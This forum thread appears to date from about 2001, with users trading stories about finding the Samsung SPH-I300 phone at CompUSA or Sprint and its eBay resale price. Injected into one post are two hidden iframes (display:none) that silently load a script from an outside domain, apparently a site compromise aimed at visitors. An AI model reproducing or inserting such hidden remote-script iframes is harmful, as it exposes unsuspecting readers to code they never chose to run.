+ Reply to Thread

Finding the SPH-I300

Where did you all find yours? I found mine at CompUSA, ended up getting the demo unit.... didn't care though, as long as I got one...

I've seen them selling at ebay for a nice premium....

Brooks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

First i woul like to thank you for the forum

I got mine at comp-usa Albany the 06-10-01. I called and they had only one so i drove 4 hours from Montreal to get it, it is not available in Canada
    Marc-André Pïlon

Exclamation

It's hard for me to believe that SprintPCS actually allowed one of their partners (CompUSA) to get and sell the phones before they did.

I can't find the phone anywhere in the Chicago area and someone told me CompUSA was telling folks they had it to get them into the store.

Anyone know anything about this?

Administrator

Arrow

yes, thanks for the board....

i got mine thru sprint believe it or not... the compusa here has them also...:p

your compusa has them in stock? they're selling on ebay for close to $700....

Brooks

Administrator

Arrow

Originally posted by fikse
    your compusa has them in stock? they're selling on ebay for close to $700....

Brooks
    isnt that sily? 700 bucks!!! WOW!!

hell, if anyone wanted one, they could send me the money and i wil go to compusa and send it to them.....